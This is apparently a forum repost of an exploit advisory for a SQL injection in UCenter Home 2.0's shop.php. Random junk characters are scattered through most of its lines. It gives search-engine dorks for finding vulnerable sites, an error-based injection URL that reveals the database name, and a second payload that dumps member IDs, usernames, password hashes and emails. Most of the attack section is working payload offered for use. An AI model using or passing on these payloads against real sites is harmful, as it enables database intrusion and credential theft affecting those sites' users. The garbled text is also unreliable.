" k; d8 k4 D3 v$ g+ k$ e3 |6 J( q
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ : o/ W3 l- U) e" q, o; v
7 K5 W5 F7 f; Y
: r0 j. s+ x$ ^9 Y9 r; S7 I2 |2 ~* {
*/ Author : KnocKout
: U1 g3 c+ p+ w7 y, r: p
2 c' l) g; l4 L' H*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
& N6 b* B g; B1 y* W; }7 ~+ W' U9 X
*/ Contact: knockoutr@msn.com 1 z8 _. c3 ?$ ~. W5 d
$ h9 \4 _% s: z3 ^; _*/ Cyber-Warrior.org/CWKnocKout 0 J+ p( m( H4 V5 `
$ x# N$ J6 A9 Y5 r' k* O' j__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
/ M0 ~" b7 ~3 S- e! Q) Z( E0 C% i5 J7 ]* ^- U
Script : UCenter Home % P( ?% b9 }! W6 ]' h4 n
+ B- z! P5 o1 P, V9 fVersion : 2.0
, R" C- B" D5 w9 A
" W' f" J- N' ?* i' BScript HomePage : http://u.discuz.net/ 3 D, R0 ?" T" w; J( ?, R
- G- t& p* O% l# v V2 j6 L, C: a__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ; \5 [7 P0 h& k
$ u: f [+ m' u0 y
Dork : Powered by UCenter inurl:shop.php?ac=view ) {3 R- e& t8 j9 \4 C8 L
$ ^+ F6 B3 x* J# N! sDork 2 : inurl:shop.php?ac=view&shopid=
# ]; n* D g( G f! E$ W8 c
6 ~" Y$ v& }% c1 I__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 5 j8 C7 w" j. D0 X( F) g
$ J6 S/ o8 X4 s3 s M
Vuln file : Shop.php , u/ |( J/ t7 J3 N: R8 Z
4 p5 l3 y4 R# J3 Y+ |value's : (?)ac=view&shopid=
* b6 N/ T }; ]" }$ x, C/ r2 P3 X9 w# r* ?5 J) D' y9 L m
Vulnerable Style : SQL Injection (MySQL Error Based) 2 U S1 z; @4 H+ g4 P! F
[) X5 V2 A3 \5 H4 J* H8 }Need Metarials : Hex Conversion
; ]4 K+ h2 b& T$ Z
9 N/ H4 ^; H, O* U( H__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== $ L; U6 A, O& P" p1 F
' _% w- B" J! v9 a; |. `' J1 vYour Need victim Database name. `# V* W# D' a9 M
+ J. j z& c6 w5 Q. {+ e
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 * `4 a% w3 \% Y D y
2 z$ W' W0 _4 e7 Y! a i0 D% J.. 6 D) y( k5 `) f K3 F4 y3 A0 h
& L" b3 |5 C/ F3 {) vDB : Okey. 7 Y& |7 }( s+ a' R; D6 I: ]
& _4 `3 _ {. r: B( c8 W
your edit DB `[TARGET DB NAME]` & @1 a( j. b; [& B! Q$ ~) n! M; n
. Y$ e0 E" z+ \' ^3 Y3 G
Example : 'hiwir1_ucenter' " h2 a* `2 q, s, i$ L
$ e3 l1 }) T- R* n+ y/ A" |
Edit : Okey. 3 S' v/ }" k" l* t
% d7 r/ i% j7 E m8 R' K3 I4 H9 e$ jYour use Hex conversion. And edit Your SQL Injection Exploit..
2 D, n9 d v" O( l" S! p6 @
6 O* I( H' P( @: L2 [! l
; h% b8 N3 z( K5 G3 M: d
& ]( ]/ Z3 @. a& N* v7 FExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 2 M. I* W' Q& f2 b' L5 o1 d$ M& O
|
发表于 2013-2-27 21:31:31
收藏
支持
反对